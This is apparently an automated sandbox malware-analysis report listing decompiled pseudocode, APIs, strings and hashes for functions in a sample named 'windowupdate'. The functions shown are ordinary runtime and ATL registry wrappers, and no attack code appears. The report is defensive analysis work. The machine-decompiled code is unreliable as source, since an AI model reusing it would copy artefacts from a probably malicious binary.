                      • Instruction Fuzzy Hash: 914181B0E00209EFDB44EF94C959BAEBB71AF45304F2441A8D0456B346D771DE09DBB5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 85%
                      			E00D802D0(intOrPtr __ecx) {
                      				intOrPtr _v8;
                      				intOrPtr* _v12;
                      				signed int _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr* _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				intOrPtr _t55;
                      				void* _t59;
                      				intOrPtr _t66;
                      				intOrPtr _t74;
                      				void* _t82;
                      
                      				_v8 = __ecx;
                      				if((E00D7FE50(_v8) & 0x000000ff) != 0) {
                      					_t66 = _v8;
                      					__eflags =  *((intOrPtr*)(_t66 + 0x45c)) - 2;
                      					if( *((intOrPtr*)(_t66 + 0x45c)) != 2) {
                      						L4:
                      						return 1;
                      					}
                      					_t74 = _v8;
                      					__eflags =  *((intOrPtr*)(_t74 + 0x458)) - 1;
                      					if( *((intOrPtr*)(_t74 + 0x458)) == 1) {
                      						_v28 = _v8 + 0x464;
                      						_t10 = _v8 + 0xaa4; // 0xb60fff45
                      						_t13 = ( *_t10 << 4) + 0x474; // 0xd6b9ec
                      						_v32 = _v8 + _t13;
                      						_v12 = _v28;
                      						while(1) {
                      							__eflags = _v12 - _v32;
                      							if(_v12 == _v32) {
                      								break;
                      							}
                      							_t23 = _v8 + 0x14; // 0x8b18408b
                      							 *((intOrPtr*)(_v12 + 8)) =  *_t23;
                      							_v16 =  *_v12;
                      							_v16 = _v16 - 1;
                      							__eflags = _v16 - 3;
                      							if(_v16 > 3) {
                      								__eflags = 0;
                      								if(0 == 0) {
                      									_v20 = 0;
                      								} else {
                      									_v20 = 1;
                      								}
                      								_v24 = _v20;
                      								__eflags = _v24;
                      								if(__eflags == 0) {
                      									_t59 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\inc\\corecrt_internal_stdio_output.h", 0x4af, 0, L"%ls", L"(\"Missing position in the format string\", 0)");
                      									_t82 = _t82 + 0x18;
                      									__eflags = _t59 - 1;
                      									if(_t59 == 1) {
                      										asm("int3");
                      									}
                      								}
                      								__eflags = _v24;
                      								if(_v24 != 0) {
                      									L22:
                      									_t55 = _v12 + 0x10;
                      									__eflags = _t55;
                      									_v12 = _t55;
                      									continue;
                      								} else {
                      									 *((intOrPtr*)(L00D82F70(0))) = 0x16;
                      									E00D82900(L"(\"Missing position in the format string\", 0)", L"__crt_stdio_output::positional_parameter_base<wchar_t,class __crt_stdio_output::stream_output_adapter<wchar_t> >::validate_and_update_state_at_end_of_format_string", L"minkernel\\crts\\ucrt\\inc\\corecrt_internal_stdio_output.h", 0x4af, 0);
                      									return 0;
                      								}
                      							}
                      							switch( *((intOrPtr*)(_v16 * 4 +  &M00D80458))) {
                      								case 0:
                      									E00D64910(_v8 + 0x14);
                      									_t82 = _t82 + 4;
                      									goto L22;
                      								case 1:
                      									_v8 = _v8 + 0x14;
                      									__eax = E00D64B30(_v8 + 0x14);
                      									goto L22;
                      								case 2:
                      									_v8 = _v8 + 0x14;
                      									__eax = E00D64AF0(_v8 + 0x14);
                      									goto L22;
                      								case 3:
                      									_v8 = _v8 + 0x14;
                      									_v40 = E00D64B10(_v8 + 0x14);
                      									_v36 = __edx;
                      									goto L22;
                      							}
                      						}
                      						return 1;
                      					}
                      					goto L4;
                      				}
                      				return 0;
                      			}

                      Strings
                      • ("Missing position in the format string", 0), xrefs: 00D803F1, 00D80439
                      • __crt_stdio_output::positional_parameter_base<wchar_t,class __crt_stdio_output::stream_output_adapter<wchar_t> >::validate_and_upd, xrefs: 00D80434
                      • minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h, xrefs: 00D80402, 00D8042F
                      • %ls, xrefs: 00D803F6
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID:
                      • String ID: %ls$("Missing position in the format string", 0)$__crt_stdio_output::positional_parameter_base<wchar_t,class __crt_stdio_output::stream_output_adapter<wchar_t> >::validate_and_upd$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                      • API String ID: 0-208977200
                      • Opcode ID: ec2b4242086fd08684e968930797ea86bfde4ffd196228ab32a03b30697ed91e
                      • Instruction ID: 8116f13317136c1b7608752d4bb42001ad9229a918041608213012ecbda49b5f
                      • Opcode Fuzzy Hash: ec2b4242086fd08684e968930797ea86bfde4ffd196228ab32a03b30697ed91e
                      • Instruction Fuzzy Hash: 154171B0E44209EFCB54EF98D942BAEBB71AF41304F2441A8E50567342D771EE09DBB5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 85%
                      			E00D80470(intOrPtr __ecx) {
                      				intOrPtr _v8;
                      				intOrPtr* _v12;
                      				signed int _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr* _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				intOrPtr _t55;
                      				void* _t59;
                      				intOrPtr _t66;
                      				intOrPtr _t74;
                      				void* _t82;
                      
                      				_v8 = __ecx;
                      				if((E00D7FEF0(_v8) & 0x000000ff) != 0) {
                      					_t66 = _v8;
                      					__eflags =  *((intOrPtr*)(_t66 + 0x45c)) - 2;
                      					if( *((intOrPtr*)(_t66 + 0x45c)) != 2) {
                      						L4:
                      						return 1;
                      					}
                      					_t74 = _v8;
                      					__eflags =  *((intOrPtr*)(_t74 + 0x458)) - 1;
                      					if( *((intOrPtr*)(_t74 + 0x458)) == 1) {
                      						_v28 = _v8 + 0x464;
                      						_t10 = _v8 + 0xaa4; // 0xd6c80f
                      						_t13 = ( *_t10 << 4) + 0x474; // 0xd6c1fc
                      						_v32 = _v8 + _t13;
                      						_v12 = _v28;
                      						while(1) {
                      							__eflags = _v12 - _v32;
                      							if(_v12 == _v32) {
                      								break;
                      							}
                      							_t23 = _v8 + 0x14; // 0x8b18408b
                      							 *((intOrPtr*)(_v12 + 8)) =  *_t23;
                      							_v16 =  *_v12;
                      							_v16 = _v16 - 1;
                      							__eflags = _v16 - 3;
                      							if(_v16 > 3) {
                      								__eflags = 0;
                      								if(0 == 0) {
                      									_v20 = 0;
                      								} else {
                      									_v20 = 1;
                      								}
                      								_v24 = _v20;
                      								__eflags = _v24;
                      								if(__eflags == 0) {
                      									_t59 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\inc\\corecrt_internal_stdio_output.h", 0x4af, 0, L"%ls", L"(\"Missing position in the format string\", 0)");
                      									_t82 = _t82 + 0x18;
                      									__eflags = _t59 - 1;
                      									if(_t59 == 1) {
                      										asm("int3");
                      									}
                      								}
                      								__eflags = _v24;
                      								if(_v24 != 0) {
                      									L22:
                      									_t55 = _v12 + 0x10;
                      									__eflags = _t55;
                      									_v12 = _t55;
                      									continue;
                      								} else {
                      									 *((intOrPtr*)(L00D82F70(0))) = 0x16;
                      									E00D82900(L"(\"Missing position in the format string\", 0)", L"__crt_stdio_output::positional_parameter_base<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t> >::validate_and_update_state_at_end_of_format_string", L"minkernel\\crts\\ucrt\\inc\\corecrt_internal_stdio_output.h", 0x4af, 0);
                      									return 0;
                      								}
                      							}
                      							switch( *((intOrPtr*)(_v16 * 4 +  &M00D805F8))) {
                      								case 0:
                      									E00D64910(_v8 + 0x14);
                      									_t82 = _t82 + 4;
                      									goto L22;
                      								case 1:
                      									_v8 = _v8 + 0x14;
                      									__eax = E00D64B30(_v8 + 0x14);
                      									goto L22;
                      								case 2:
                      									_v8 = _v8 + 0x14;
                      									__eax = E00D64AF0(_v8 + 0x14);
                      									goto L22;
                      								case 3:
                      									_v8 = _v8 + 0x14;
                      									_v40 = E00D64B10(_v8 + 0x14);
                      									_v36 = __edx;
                      									goto L22;
                      							}
                      						}
                      						return 1;
                      					}
                      					goto L4;
                      				}
                      				return 0;
                      			}

                      Strings
                      • __crt_stdio_output::positional_parameter_base<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t> >::validate_and_upd, xrefs: 00D805D4
                      • ("Missing position in the format string", 0), xrefs: 00D80591, 00D805D9
                      • minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h, xrefs: 00D805A2, 00D805CF
                      • %ls, xrefs: 00D80596
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID:
                      • String ID: %ls$("Missing position in the format string", 0)$__crt_stdio_output::positional_parameter_base<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t> >::validate_and_upd$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                      • API String ID: 0-53979339
                      • Opcode ID: 847018b6db0af4d44502862dfb56f98e30a53335b4ef3d13fef7decc8d1bfe63
                      • Instruction ID: 6895572d2aaef2d6d071de7ff6896a62cf2ae0082631a20f18e90700ef5b28b5
                      • Opcode Fuzzy Hash: 847018b6db0af4d44502862dfb56f98e30a53335b4ef3d13fef7decc8d1bfe63
                      • Instruction Fuzzy Hash: EF418EB0E40209EFCB44EF98C952AAEBBB1AF45308F2441A8D54167342D731EE09DFB5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 54%
                      			E00D3BE20(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
                      				char _v8;
                      				char _v12;
                      				char _v16;
                      				char _v20;
                      				char _v24;
                      				char _v28;
                      				void* _t30;
                      				void* _t35;
                      				void* _t38;
                      				void* _t40;
                      				void* _t46;
                      				void* _t48;
                      				intOrPtr _t61;
                      				void* _t65;
                      				void* _t68;
                      				void* _t69;
                      
                      				_t66 = __esi;
                      				_t65 = __edi;
                      				_t48 = __ebx;
                      				_v28 = 0xcccccccc;
                      				_v24 = 0xcccccccc;
                      				_v20 = 0xcccccccc;
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				if(_a4 == 0) {
                      					E00D324B0(__esi, 0xc0000005, 1);
                      				}
                      				if(_a8 == 0) {
                      					L4:
                      					_t30 = L00D84930(_t73, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x2094, 0, "%ls", L"pData != 0 && pObject != 0");
                      					_t69 = _t69 + 0x18;
                      					if(_t30 == 1) {
                      						asm("int3");
                      					}
                      					L6:
                      					if(_a8 == 0 || _a12 == 0) {
                      						E00D324B0(_t66, 0xc0000005, 1);
                      					}
                      					 *_a8 = _a12;
                      					_t67 = _t69;
                      					 *((intOrPtr*)(_a8 + 4)) = E00DC1520(GetCurrentThreadId(), _t69 - _t69);
                      					_t61 = _a4 + 4;
                      					E00D41D00(_t48,  &_v16, _t65, _t69, _t61, 0);
                      					_t35 = E00D41D90( &_v16, _t69);
                      					_t78 = _t35;
                      					if(_t35 >= 0) {
                      						 *((intOrPtr*)(_a8 + 8)) =  *((intOrPtr*)(_a4 + 0x1c));
                      						_t61 = _a4;
                      						 *((intOrPtr*)(_t61 + 0x1c)) = _a8;
                      						_t38 = E00D41D60( &_v16);
                      					} else {
                      						_push("ERROR : Unable to lock critical section in AtlWinModuleAddCreateWndData\n");
                      						_push(0);
                      						_push(E00D3F1E0(0xf23748));
                      						_push(E00D323B0( &_v28, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x209d));
                      						E00D323E0(_t48, _t65, _t67, _t78);
                      						_t69 = _t69 + 0x10;
                      						if(0 == 0) {
                      							_t46 = L00D84930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x209e, 0, "%ls", 0xde40dc);
                      							_t69 = _t69 + 0x18;
                      							if(_t46 == 1) {
                      								asm("int3");
                      							}
                      						}
                      						_t38 = E00D41D60( &_v16);
                      					}
                      					_push(_t61);
                      					E00DC14C0(_t68, 0xd3bf74);
                      					_t40 = _t38;
                      					return E00DC1520(_t40, _t68 - _t69 + 0x18);
                      				}
                      				_t73 = _a12;
                      				if(_a12 != 0) {
                      					goto L6;
                      				}
                      				goto L4;
                      			}




















                      APIs
                      • GetCurrentThreadId.KERNEL32 ref: 00D3BEA4
                      • _Smanip.LIBCPMTD ref: 00D3BEF3
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D3BF5C
                        • Part of subcall function 00D324B0: RaiseException.KERNEL32(?,?,00000000,00000000), ref: 00D324C2
                      Strings
                      • ERROR : Unable to lock critical section in AtlWinModuleAddCreateWndData, xrefs: 00D3BED4
                      • pData != 0 && pObject != 0, xrefs: 00D3BE5C
                      • %ls, xrefs: 00D3BE61, 00D3BF0A
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00D3BE6D, 00D3BF16
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00D3BEEB
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckCurrentExceptionRaiseSmanipStackThreadVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$ERROR : Unable to lock critical section in AtlWinModuleAddCreateWndData$pData != 0 && pObject != 0
                      • API String ID: 2312070509-3206224083
                      • Opcode ID: 907f69f7071d5274ff33dfa63433c1e7547ea46b94380ec841ab5bc9e7b6b2c8
                      • Instruction ID: dde803b43d320d69faea2ccb856967768cd2e0ff56f508456ed3087191bd7234
                      • Opcode Fuzzy Hash: 907f69f7071d5274ff33dfa63433c1e7547ea46b94380ec841ab5bc9e7b6b2c8
                      • Instruction Fuzzy Hash: 3431E774E40308AFDB10FF68DC43BAE7764EF50754F14811AFA19A7282E7B19A44CAB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 83%
                      			E00D33200(intOrPtr __ecx, void* __esi, void* _a4, char* _a8, int _a12, char* _a16, int _a20, int _a24, struct _SECURITY_ATTRIBUTES* _a28, void** _a32, int* _a36) {
                      				intOrPtr* _v8;
                      				struct HINSTANCE__* _v12;
                      				struct HINSTANCE__* _v16;
                      				void* _t35;
                      				long _t40;
                      				_Unknown_base(*)()* _t43;
                      				void* _t49;
                      				void* _t50;
                      				void* _t72;
                      				void* _t73;
                      
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				if( *_v8 == 0) {
                      					__eflags =  *((intOrPtr*)(_v8 + 4));
                      					if(__eflags == 0) {
                      						L11:
                      						_t35 = 1;
                      						L12:
                      						return E00DC1520(_t35, _t72 - _t73 + 0xc);
                      					}
                      					_t40 = RegCreateKeyExA(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
                      					__eflags = _t73 - _t73;
                      					_t35 = E00DC1520(_t40, __eflags);
                      					goto L12;
                      				}
                      				_v12 = E00DC1520(GetModuleHandleA("Advapi32.dll"), _t73 - _t73);
                      				_t77 = _v12;
                      				if(_v12 == 0) {
                      					_t50 = L00D84930(_t77, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atltransactionmanager.h", 0x27d, 0, "%ls", L"hAdvAPI32 != 0");
                      					_t73 = _t73 + 0x18;
                      					if(_t50 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(_v12 != 0) {
                      					_t43 = GetProcAddress(_v12, "RegCreateKeyTransactedA");
                      					__eflags = _t73 - _t73;
                      					_v16 = E00DC1520(_t43, _t73 - _t73);
                      					__eflags = _v16;
                      					if(__eflags == 0) {
                      						goto L11;
                      					}
                      					_t49 = _v16(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_v8, 0);
                      					__eflags = _t73 - _t73;
                      					_t35 = E00DC1520(_t49, __eflags);
                      				} else {
                      					_t35 = 1;
                      				}
                      			}














                      APIs
                      • GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00D33232
                      • GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedA), ref: 00D33289
                      • RegCreateKeyExA.ADVAPI32(CCCCCCCC,CCCCCCCC,?,?,?,?,?,?,?), ref: 00D3330A
                      Strings
                      • hAdvAPI32 != 0, xrefs: 00D33248
                      • %ls, xrefs: 00D3324D
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atltransactionmanager.h, xrefs: 00D33259
                      • Advapi32.dll, xrefs: 00D3322D
                      • RegCreateKeyTransactedA, xrefs: 00D33280
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: AddressCreateHandleModuleProc
                      • String ID: %ls$Advapi32.dll$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atltransactionmanager.h$RegCreateKeyTransactedA$hAdvAPI32 != 0
                      • API String ID: 1964897782-1911401746
                      • Opcode ID: de343d267e640871bfb8f7243af602025a741c1047bf3e842539b62eb483ff15
                      • Instruction ID: 2e4df8d3fa32e9ad4d2c4463bd336071c0c1aa02c2c49a590dab35fc48a836f4
                      • Opcode Fuzzy Hash: de343d267e640871bfb8f7243af602025a741c1047bf3e842539b62eb483ff15
                      • Instruction Fuzzy Hash: 75313A76A04119EFCB14EF8DD986FDE77B9AB48300F148248F909A7291D674DE80CBB5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 83%
                      			E00D330F0(intOrPtr __ecx, void* __esi, void* _a4, char* _a8, int _a12, int _a16, void** _a20) {
                      				intOrPtr* _v8;
                      				struct HINSTANCE__* _v12;
                      				struct HINSTANCE__* _v16;
                      				void* _t27;
                      				long _t31;
                      				_Unknown_base(*)()* _t34;
                      				void* _t39;
                      				void* _t40;
                      				void* _t56;
                      				void* _t57;
                      
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				if( *_v8 == 0) {
                      					__eflags =  *((intOrPtr*)(_v8 + 4));
                      					if(__eflags == 0) {
                      						L11:
                      						_t27 = 1;
                      						L12:
                      						return E00DC1520(_t27, _t56 - _t57 + 0xc);
                      					}
                      					_t31 = RegOpenKeyExA(_a4, _a8, _a12, _a16, _a20);
                      					__eflags = _t57 - _t57;
                      					_t27 = E00DC1520(_t31, __eflags);
                      					goto L12;
                      				}
                      				_v12 = E00DC1520(GetModuleHandleA("Advapi32.dll"), _t57 - _t57);
                      				_t61 = _v12;
                      				if(_v12 == 0) {
                      					_t40 = L00D84930(_t61, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atltransactionmanager.h", 0x255, 0, "%ls", L"hAdvAPI32 != 0");
                      					_t57 = _t57 + 0x18;
                      					if(_t40 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(_v12 != 0) {
                      					_t34 = GetProcAddress(_v12, "RegOpenKeyTransactedA");
                      					__eflags = _t57 - _t57;
                      					_v16 = E00DC1520(_t34, _t57 - _t57);
                      					__eflags = _v16;
                      					if(__eflags == 0) {
                      						goto L11;
                      					}
                      					_t39 = _v16(_a4, _a8, _a12, _a16, _a20,  *_v8, 0);
                      					__eflags = _t57 - _t57;
                      					_t27 = E00DC1520(_t39, __eflags);
                      				} else {
                      					_t27 = 1;
                      				}
                      			}














                      APIs
                      • GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00D33122
                      • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedA), ref: 00D33179
                      • RegOpenKeyExA.ADVAPI32(CCCCCCCC,CCCCCCCC,?,?,?), ref: 00D331DA
                      Strings
                      • RegOpenKeyTransactedA, xrefs: 00D33170
                      • hAdvAPI32 != 0, xrefs: 00D33138
                      • %ls, xrefs: 00D3313D
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atltransactionmanager.h, xrefs: 00D33149
                      • Advapi32.dll, xrefs: 00D3311D
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: AddressHandleModuleOpenProc
                      • String ID: %ls$Advapi32.dll$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atltransactionmanager.h$RegOpenKeyTransactedA$hAdvAPI32 != 0
                      • API String ID: 1337834000-1483138269
                      • Opcode ID: 28253d84e9cf378ecea0d21d9380b717e0679d0aa07e4fcb22b32ec8fae3e957
                      • Instruction ID: 9a1d0ad53d9bdcb88dd183a8f8582e036b479bff4d4cd06a60b827f282fb7596
                      • Opcode Fuzzy Hash: 28253d84e9cf378ecea0d21d9380b717e0679d0aa07e4fcb22b32ec8fae3e957
                      • Instruction Fuzzy Hash: CC315A72E00219AFCB20EF99D986F9E77B5AB48300F148148F905A7291D276DE80CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 66%
                      			E00D34310(void** __ecx, void* __esi, char* _a4) {
                      				void** _v8;
                      				struct HINSTANCE__* _v12;
                      				long _t23;
                      				void* _t24;
                      				void* _t27;
                      				struct HINSTANCE__* _t28;
                      				_Unknown_base(*)()* _t31;
                      				void* _t34;
                      				void* _t48;
                      				void* _t53;
                      				void* _t54;
                      
                      				_t48 = __esi;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				do {
                      					_t56 =  *_v8;
                      					if( *_v8 == 0) {
                      						_t34 = L00D84930(_t56, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x167c, 0, "%ls", L"m_hKey != 0");
                      						_t54 = _t54 + 0x18;
                      						if(_t34 == 1) {
                      							asm("int3");
                      						}
                      					}
                      				} while (0 != 0);
                      				if(_v8[2] == 0) {
                      					__eflags =  *0xf23698 & 0x000000ff;
                      					if(( *0xf23698 & 0x000000ff) == 0) {
                      						_t28 = GetModuleHandleA("Advapi32.dll");
                      						__eflags = _t54 - _t54;
                      						_v12 = E00DC1520(_t28, _t54 - _t54);
                      						__eflags = _v12;
                      						if(_v12 != 0) {
                      							_t31 = GetProcAddress(_v12, "RegDeleteKeyExA");
                      							__eflags = _t54 - _t54;
                      							 *0xf215dc = E00DC1520(_t31, _t54 - _t54);
                      						}
                      						 *0xf23698 = 1;
                      					}
                      					__eflags =  *0xf215dc;
                      					if( *0xf215dc == 0) {
                      						_t23 = RegDeleteKeyA( *_v8, _a4);
                      						__eflags = _t54 - _t54;
                      						_t24 = E00DC1520(_t23, __eflags);
                      					} else {
                      						_t27 =  *0xf215dc( *_v8, _a4, _v8[1], 0);
                      						__eflags = _t54 - _t54;
                      						_t24 = E00DC1520(_t27, __eflags);
                      					}
                      				} else {
                      					_t24 = E00D33330(_v8[2], _t48,  *_v8, _a4);
                      				}
                      				return E00DC1520(_t24, _t53 - _t54 + 8);
                      			}















                      APIs
                      • GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00D3438F
                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExA), ref: 00D343B0
                      • RegDeleteKeyA.ADVAPI32(00000000,CCCCCCCC), ref: 00D34402
                      Strings
                      • %ls, xrefs: 00D34335
                      • Advapi32.dll, xrefs: 00D3438A
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00D34341
                      • m_hKey != 0, xrefs: 00D34330
                      • RegDeleteKeyExA, xrefs: 00D343A7
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
